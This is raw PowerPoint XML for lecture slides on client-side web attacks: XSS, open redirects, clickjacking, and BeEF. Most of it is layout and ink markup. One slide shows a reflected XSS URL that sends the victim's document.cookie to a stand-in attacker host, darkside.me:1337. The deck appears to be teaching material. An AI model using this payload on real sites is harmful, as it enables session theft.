Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink538.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3810.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2311.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink546.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink562.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink564.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink578.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink586.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink494.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink506.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink533.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink499.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink504.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink520.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink541.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink553.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink557.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink572.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink581.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink528.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink496.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink515.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1311.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink536.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink549.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink560.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink567.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink576.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink584.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png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06" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink511.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink523.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink500.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink505.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink507.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink531.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink544.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink554.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3910.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink570.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink57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Remaining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Client-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Attacks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4286"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>XSS, Open Redirects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT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5D66F7-466A-41D8-9E8B-B21DFE769819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681302" y="2115274"/>
            <a:ext cx="6829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popping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up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cookie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is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lame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21252B3-9888-4154-8E8B-815ACC0ADB4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681302" y="3136612"/>
            <a:ext cx="6829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you‘r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right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...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405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D427DEA-1E83-4155-B388-6A7E268FFF52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2183064" y="457991"/>
            <a:ext cx="94803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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>http://lightside.me/forum/foverview.php?uname=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>%3Cscript%3Enew%20Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>%22http://darkside.me:1337/%22%2bdocument.cookie%3C/script%3E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81FB3DC-2858-4E2B-8687-7EBD09491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64" y="4136662"/>
            <a:ext cx="8903456" cy="205099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CD07FB5-DA03-4238-A087-2EDD22463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064" y="2029298"/>
            <a:ext cx="60388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7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9D858BD-53FB-47AE-AEBE-AAD595E8DEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4426020" y="2041701"/>
            <a:ext cx="27105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still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lame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65B893-DA1A-4373-9CD5-B175BEA8E88B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2092141" y="3136612"/>
            <a:ext cx="80077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Let‘s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what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can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BeEF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1415C4-7DE1-4535-A32F-3BDA092F7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311" y="3867807"/>
            <a:ext cx="2787377" cy="21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0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A32D436-33B4-4EDC-B8BB-C8BA32E90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E3BF90C-63CC-4F8E-A0B3-4612F6768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575"/>
            <a:ext cx="12192000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7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C1C644E-9ABC-41C0-91DF-0C9DE917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225"/>
            <a:ext cx="12192000" cy="5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82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E86325E-F05E-4B27-834C-D1C23A3B3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684" y="0"/>
            <a:ext cx="9352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0941751"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="5225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1106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5212683"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="5225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7257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3886980"/>
            <a:ext cx="4253553" cy="2592591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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BFAB586D-72EF-470E-A89D-91EC7E4C022C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656095" y="424854"/>
            <a:chExt cx="1629720" cy="936720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9A69FD5-C9BA-478D-99A3-681992EBA07A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="656095" y="424854"/>
              <a:ext cx="1629720" cy="936720"/>
              <a:chOff x="1065608" y="369674"/>
              <a:chExt cx="1629720" cy="93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C9BAA366-AF6D-4946-94B4-B2A80239E879}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1065608" y="417194"/>
                  <a:ext cx="46800" cy="888480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="10" name="Freihand 9">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D1B89FF-8C8D-45C5-8837-9055BC1883FA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056968" y="408554"/>
                    <a:ext cx="64440" cy="90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9C5CAD1F-F130-4C57-81A1-54E2BF95B304}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1119968" y="371114"/>
                  <a:ext cx="1480320" cy="6264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3085F9CD-51B8-4362-8D00-C832AA2EBA5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110968" y="362474"/>
                    <a:ext cx="149796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20603052-767B-4A8E-9378-C34AED14647D}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1085048" y="1257794"/>
                  <a:ext cx="1575720" cy="4860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A82FFF48-92CC-47C0-94E5-6C9F963FD960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076408" y="1248794"/>
                    <a:ext cx="159336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2B18454C-65D3-4F9F-B69F-01004FD597A5}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2617928" y="369674"/>
                  <a:ext cx="77400" cy="89064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E1513140-B5EF-417C-AC9E-74C1A6C90D6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609288" y="360674"/>
                    <a:ext cx="95040" cy="90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E7E24BAE-5D20-4098-BCEA-9443374307E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="838615" y="547149"/>
              <a:ext cx="1353960" cy="245880"/>
              <a:chOff x="1248128" y="723194"/>
              <a:chExt cx="1353960" cy="24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8E303561-2809-4018-A4A1-8D43E7846174}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1248128" y="844874"/>
                  <a:ext cx="147600" cy="12420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AD9C54D5-2DF8-4D1E-8238-E76727F4568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39128" y="835874"/>
                    <a:ext cx="16524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6C01D7EE-F64A-4F37-A7AC-CDE68D757D33}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1398968" y="723194"/>
                  <a:ext cx="17280" cy="235080"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="32" name="Freihand 31">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C8E4168-69D5-4EF9-B15A-BA2AEB1C4A4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389968" y="714194"/>
                    <a:ext cx="3492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8E66B253-78CF-426F-BBCD-6D8C0CDC7C23}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1460888" y="838394"/>
                  <a:ext cx="109440" cy="114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09ECF8A4-8D1D-4BC3-BEF3-9BDAA8FF274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452248" y="829754"/>
                    <a:ext cx="12708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18AF9096-0301-4CB1-A9E8-0681BDB75A25}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1565288" y="845954"/>
                  <a:ext cx="29160" cy="979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8F93437B-F85D-4125-9687-30B1E3B75B3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556288" y="837314"/>
                    <a:ext cx="468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D4C573B5-D355-4888-93FD-13CE773DD37C}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1608488" y="816794"/>
                  <a:ext cx="86040" cy="111960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="35" name="Freihand 34">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E64A6B-6FB7-43DE-80E0-65255AB3A23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599848" y="808154"/>
                    <a:ext cx="10368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9BA22D1C-DA48-4AD6-B35E-BDE8EBAC2458}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1729088" y="749114"/>
                  <a:ext cx="19080" cy="177840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="37" name="Freihand 36">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61834A8-3C09-45B1-8F64-F7BD144E338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720088" y="740474"/>
                    <a:ext cx="3672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25046F34-AB03-407D-ACFE-A9BE9B0D4D6F}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1747808" y="803834"/>
                  <a:ext cx="59040" cy="121320"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="38" name="Freihand 37">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3888D57B-0D40-4506-BAAB-43F8EFF1791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738808" y="794834"/>
                    <a:ext cx="7668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0246770D-FC90-415E-ADD4-01821FE77D45}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1821968" y="812474"/>
                  <a:ext cx="93600" cy="111600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="39" name="Freihand 38">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88C06193-57BE-4019-A4DF-25421FFD40E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812968" y="803834"/>
                    <a:ext cx="1112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CB32F8C8-B476-446C-ADAA-493F8C479FD9}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1953728" y="836594"/>
                  <a:ext cx="31680" cy="1076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F475C2A7-DEE6-48C4-8194-9406A151CC4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945088" y="827594"/>
                    <a:ext cx="4932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37" name="Freihand 36">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F38376E0-E5E5-45AE-8420-F43EE8E8477A}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1938608" y="751634"/>
                  <a:ext cx="4320" cy="1188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797DE076-AC42-4D1D-94B1-3F086177FB4D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929608" y="742994"/>
                    <a:ext cx="2196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38" name="Freihand 37">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E77F98BA-76C7-493D-891B-349FD0EBEB82}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2019608" y="835154"/>
                  <a:ext cx="97200" cy="89280"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="43" name="Freihand 42">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{616627CC-73E0-4CB2-8533-84B697FF8B5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010968" y="826154"/>
                    <a:ext cx="1148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39" name="Freihand 38">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E085404-5C04-4A2B-B64D-B9DC7338E39C}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2131568" y="742634"/>
                  <a:ext cx="17280" cy="183600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="44" name="Freihand 43">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9849DAD0-18DC-4394-9FBF-2B0D187642F6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122928" y="733994"/>
                    <a:ext cx="3492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C501CF93-3C6F-40A4-A21F-34699DE39470}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2175128" y="831914"/>
                  <a:ext cx="89640" cy="81360"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="45" name="Freihand 44">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DFB1F97-AB0F-423E-BD04-196C3D196E09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166128" y="823274"/>
                    <a:ext cx="10728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95E0EF96-9BDD-4544-81DD-13856536C6AE}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2296808" y="902114"/>
                  <a:ext cx="10440" cy="5400"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="46" name="Freihand 45">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB4AFCE-254A-49A8-AA5D-CFF78F94A35E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288168" y="893114"/>
                    <a:ext cx="2808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9B67ADB9-E23E-4217-8C13-25877BE929C4}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2353328" y="810314"/>
                  <a:ext cx="108360" cy="109080"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="47" name="Freihand 46">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E77E990-208C-4857-B2CA-ECAF050427F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344688" y="801674"/>
                    <a:ext cx="12600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AB78F58A-35BA-452B-8770-898424EB8F7F}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2498408" y="810314"/>
                  <a:ext cx="103680" cy="97920"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="48" name="Freihand 47">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8DD2A25-0767-4B5D-B361-51B1581E9B9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489768" y="801314"/>
                    <a:ext cx="121320" cy="115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B825D0CE-8EE1-413E-A7B6-EFCBED9287CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="812335" y="995367"/>
              <a:ext cx="1361520" cy="318240"/>
              <a:chOff x="3729526" y="1005434"/>
              <a:chExt cx="1361520" cy="318240"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="83" name="Gruppieren 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1E8174-2710-4D91-A4D8-9AFF47E38E2A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3729526" y="1005434"/>
                <a:ext cx="1055520" cy="318240"/>
                <a:chOff x="3729526" y="1005434"/>
                <a:chExt cx="1055520" cy="318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9526" y="1005434"/>
                    <a:ext cx="229320" cy="318240"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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3720526" y="996434"/>
                      <a:ext cx="246960" cy="33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5966" y="1163834"/>
                    <a:ext cx="100440" cy="15840"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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3767326" y="1154834"/>
                      <a:ext cx="118080" cy="33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326" y="1006874"/>
                    <a:ext cx="21600" cy="299160"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4010686" y="997874"/>
                      <a:ext cx="39240" cy="31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73966" y="1096154"/>
                    <a:ext cx="119160" cy="12960"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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3964966" y="1087514"/>
                      <a:ext cx="13680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79526" y="1013354"/>
                    <a:ext cx="37440" cy="297000"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
